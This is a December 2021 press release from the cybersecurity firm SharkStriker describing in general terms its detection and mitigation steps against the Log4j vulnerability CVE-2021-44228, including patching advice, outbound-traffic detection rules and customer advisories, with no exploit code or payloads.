Cybersecurity Firm SharkStriker Unveils its Detection and Mitigation Steps to Fight Log4j Vulnerability
Walnut Creek CA 94956, December 17, 2021: Log4j, a commonly used logging Java library created by Apache Software Foundation, was found to have a critical vulnerability named CVE-2021-44228. Since numerous servers and applications use the Java library, several major names like Apple iCloud, Minecraft, Steam, Apache Products, etc., were affected.
“The vulnerability is quoted to be highly critical and can impact countless servers. Hence, we recommend analyzing all the Log4j logs and any outbound requests made to the library,” says Mr. Kunal Popat, Co-Founder at SharkStriker. “Ensure upgrading to the latest patch released by Apache Software Foundation and implement detection, prevention, and mitigation rules per the Apache guidelines.”
The Log4j vulnerability is a major incident, the most critical until now, as described by some reputed public sources. We, as reputed cybersecurity service providers are always on our toes to detect and fight such critical risks. As soon as our threat lab researchers caught this vulnerability during their continuous threat hunting process, SharkStriker’s global security operations team have been taking several steps to ensure the security of our infrastructure and our partners’ and customers’ organizations.
- We assessed our own infrastructure to ensure that it is secure, completely protected, has a remediation plan, and can prevent any vulnerability so that we don’t become the medium through which adversaries can attack our partners.
- We crafted and deployed new detection and protection rules for our security tools and services based on the thousands of automated attack attempts caught by our Honeypot and the advice from the analyst community, which included:
- Since the vulnerability is in a Java library, we created rules to identify any suspicious outbound traffic originating from a Java process.
- We documented all the vulnerable libraries and the adjacent hashes to create detection rules to alert any outbound traffic going from the libraries to malicious IP addresses.
- We added many IOCs identified from our Honeypot and highlighted by analyst community feeds to our threat detection mechanism to enhance threat Intel feeds and ensure detection of suspicious traffic in real-time.
- We tried to mitigate the panic by quickly releasing a security advisory across our partners and customers to spread awareness about the vulnerability. The advisory precisely highlighted the brief about the Log4J vulnerability, patches, and workarounds available, and what our SOC team was doing to ensure our partners’ and customers’ IT environments were secure.
- We reached out to all our customers who were vulnerable to the exploit to ensure that they had upgraded the applications and applied the configuration tweaks, ensuring their protection.
- We finally made all the information about the vulnerability, including the background, impact, prevention measures, IOCs, etc., available through a blog post.
Our team has done this in the first 24 hours of the exploit release. But we don’t stop here. We know that this is a continuous process, and we will continue to take all the possible measures to secure our partners and customers.
SharkStriker is a comprehensive cybersecurity services provider based in the USA. We provide all the services to deploy a 360° security. Our cybersecurity experts take immense pleasure in delivering robust security through our MDR platform built on our ORCA philosophy. Short for Observe, Response, Compliance, and Awareness, ORCA philosophy covers all the major aspects to ensure optimal security.
Learn more about SharkStriker at: https://sharkstriker.com/